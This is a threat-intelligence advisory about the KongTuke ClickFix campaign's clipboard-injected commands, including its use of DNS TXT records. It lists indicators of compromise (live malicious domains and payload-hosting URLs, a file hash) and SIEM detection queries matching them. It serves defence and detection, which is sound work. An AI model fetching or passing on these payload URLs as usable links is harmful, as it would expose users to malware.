Kongtuke Clickfix Activity

    Wednesday, February 4, 2026 In: Threat Research Print

    Date: 02/04/2026

    Severity: High

    Summary

    ClickFix-based campaigns have employed a rotating set of commands for clipboard-injected content. In late December 2025, the KongTuke campaign incorporated DNS TXT records within its ClickFix text. These campaigns regularly shift between ClickFix techniques, including the finger protocol and mshta. We will continue monitoring ClickFix activity for any renewed use of DNS TXT records.

    Indicators of Compromise (IOC) List

    Domains\URLs:

    https://emierich.com/2p2o.js

    https://emierich.com/js.php

    https://aacobson.com/3w3w.js

    https://aacobson.com/js.php

    payload.bruemald.top

    morasota.top 

    hermisron.com

    app.frugesta.top

    https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037

    Hash :

    a82dd54090493c5efa75c9219b2f0749648741bb09b6a0e3a12c3f9d134fea53

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query 1 :

    domainname like "https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037" or url like "https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037" or siteurl like "https://hermisron.com/agent?token=c98348aa5479df05dae407a4c8771f66ff1f8f0708357037" or domainname like "hermisron.com" or url like "hermisron.com" or siteurl like "hermisron.com" or domainname like "https://emierich.com/js.php" or url like "https://emierich.com/js.php" or siteurl like "https://emierich.com/js.php" or domainname like "app.frugesta.top" or url like "app.frugesta.top" or siteurl like "app.frugesta.top" or domainname like "https://aacobson.com/js.php" or url like "https://aacobson.com/js.php" or siteurl like "https://aacobson.com/js.php" or domainname like "https://aacobson.com/3w3w.js" or url like "https://aacobson.com/3w3w.js" or siteurl like "https://aacobson.com/3w3w.js" or domainname like "https://emierich.com/2p2o.js" or url like "https://emierich.com/2p2o.js" or siteurl like "https://emierich.com/2p2o.js" or domainname like "payload.bruemald.top" or url like "payload.bruemald.top" or siteurl like "payload.bruemald.top" or domainname like "morasota.top" or url like "morasota.top" or siteurl like "morasota.top"

    Detection Query 2 :

    sha256hash IN ("a82dd54090493c5efa75c9219b2f0749648741bb09b6a0e3a12c3f9d134fea53")

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-02-03-IOCs-from-KongTuke-ClickFix-activity.txt


    Tags

    KONGTUKEThreat ActorClickFix

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2026 by Gurucul - All rights reserved.